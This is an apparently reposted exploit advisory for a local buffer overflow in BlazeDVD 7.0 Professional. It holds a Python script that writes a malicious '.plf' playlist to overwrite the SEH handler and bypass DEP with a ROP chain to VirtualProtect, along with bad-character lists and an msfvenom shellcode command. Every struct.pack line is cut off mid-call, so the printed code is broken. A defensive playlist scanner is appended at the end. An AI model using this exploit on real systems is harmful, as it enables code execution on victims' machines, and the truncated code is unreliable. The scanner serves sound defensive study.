BlazeDVD 7.0 Professional Buffer Overflow ≈ Packet Storm – Digitalmunition
Published on September 1st, 2020

## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH, ASLR, DEP)
## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
## Version: 7.0.0.0
## Tested on: Windows 7 Home Basic

# Run this file
# bfile.plf will be generated
# In blazeDVD open playlist and select bfile.plf
# a pop up box will appear with text 'emalp'

## Change shellcode according to your needs
## Shellcode max size is around 700 bytes.

# bad chars:
# \x00, \x0a, \x0b, \x1a

import struct

bfile = open('bfile.plf', 'w')

buf = 'A'*84
buf += struct.pack('
buf += 'AAAA' # ret 04 ting from sehandler
buf += 'AAAA'*3 # bypassing 12 bytes i.e 0c
buf += struct.pack('
buf += 'A'*500
buf += 'BBBB' # nseh
buf += struct.pack('

#---------------------------------------------------------------------
# this way we have a lot more space for shellcode.
buf += 'AAAA'
# esp lands here.
# setting up the dynamic pointer for virtual protect
buf += struct.pack('
buf += struct.pack('
buf += struct.pack('
buf += struct.pack('
# now eax has the kernel32.dll pointer
buf += struct.pack('
buf += struct.pack('
buf += 'XXXX' # ret 4 padding
buf += struct.pack('
buf += struct.pack('
# right now eax = 98a3; esi = [0012f95c] = k32.dll val
buf += struct.pack('
buf += struct.pack('
buf += 'XXXX' # pop esi padding
buf += struct.pack('
# now eax has the pointer to VirtualProtect
#---------------------------------------------------------------------

# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM
# SETTING ESI
buf += struct.pack('
# SETTING EBP
buf += struct.pack('
buf += 'XXXX' # prev ret 4 padding
buf += struct.pack('
# SETTING EBX
buf += struct.pack('
buf += struct.pack('
buf += struct.pack('
buf += struct.pack('
# SETTING EDX
buf += struct.pack('
buf += struct.pack('
buf += struct.pack('
buf += struct.pack('
# SETTING ECX
buf += struct.pack('
buf += struct.pack('
# SETTING EDI
buf += struct.pack('
buf += struct.pack('
# SETTING EAX
buf += struct.pack('
buf += struct.pack('
# FINALLY PUSHAD
buf += struct.pack('

buf += '\x90\x90\x90\x90'*4

# shellcode generated using:
# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp"
# -b '\x00\x0a\x0b\x1a'
buf += '\x90\x90\x90\x90'*5

buf += 'E'*200

bfile.write(buf)
bfile.close()
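A defender-side check added here, not part of the original advisory or of BlazeDVD: it treats a .plf playlist as a line-oriented text file (assumption) and flags entries that carry the traits of the file the script above writes, namely an entry far longer than any real media path, a long run of one filler byte like the 84 'A's, 0x90 NOP-sled bytes, and non-printable bytes. The 260-byte limit, the run thresholds and both sample playlists are assumptions constructed for the example.

```python
import re

# Assumed threshold: Windows MAX_PATH. A genuine playlist entry (one media
# path per line) stays well under it, while the crash file above needs
# 84 bytes just to reach the SEH record.
MAX_ENTRY_LEN = 260
# 32+ repeats of one byte (e.g. the 'A'*84 filler) and 8+ NOPs (0x90 sled).
FILLER_RUN = re.compile(rb"(.)\1{31,}")
NOP_RUN = re.compile(rb"\x90{8,}")

def non_printable(raw: bytes) -> bool:
    """True if the entry holds bytes outside printable ASCII (tab allowed)."""
    return any(b != 0x09 and (b < 0x20 or b > 0x7e) for b in raw)

def scan_plf(data: bytes) -> list:
    """Return one finding per suspicious line: {'line': n, 'reasons': [...]}."""
    findings = []
    for lineno, raw in enumerate(data.splitlines(), 1):
        reasons = []
        if len(raw) > MAX_ENTRY_LEN:
            reasons.append("entry length %d exceeds %d" % (len(raw), MAX_ENTRY_LEN))
        if non_printable(raw):
            reasons.append("non-printable bytes in entry")
        if FILLER_RUN.search(raw):
            reasons.append("long run of a single filler byte")
        if NOP_RUN.search(raw):
            reasons.append("0x90 run (NOP sled)")
        if reasons:
            findings.append({"line": lineno, "reasons": reasons})
    return findings

# Constructed samples: a normal playlist and one shaped like the crash file
# (filler, SEH overwrite placeholder, NOP sled, trailing padding; no addresses).
BENIGN_PLF = b"C:\\Videos\\intro.mp4\r\nC:\\Videos\\feature.mkv\r\n"
SUSPECT_PLF = (b"C:\\Videos\\intro.mp4\r\n"
               + b"A" * 84 + b"BBBB" + b"\x90" * 16 + b"E" * 200 + b"\r\n")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PLF), ("suspect", SUSPECT_PLF)):
        print(name, scan_plf(blob))
```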
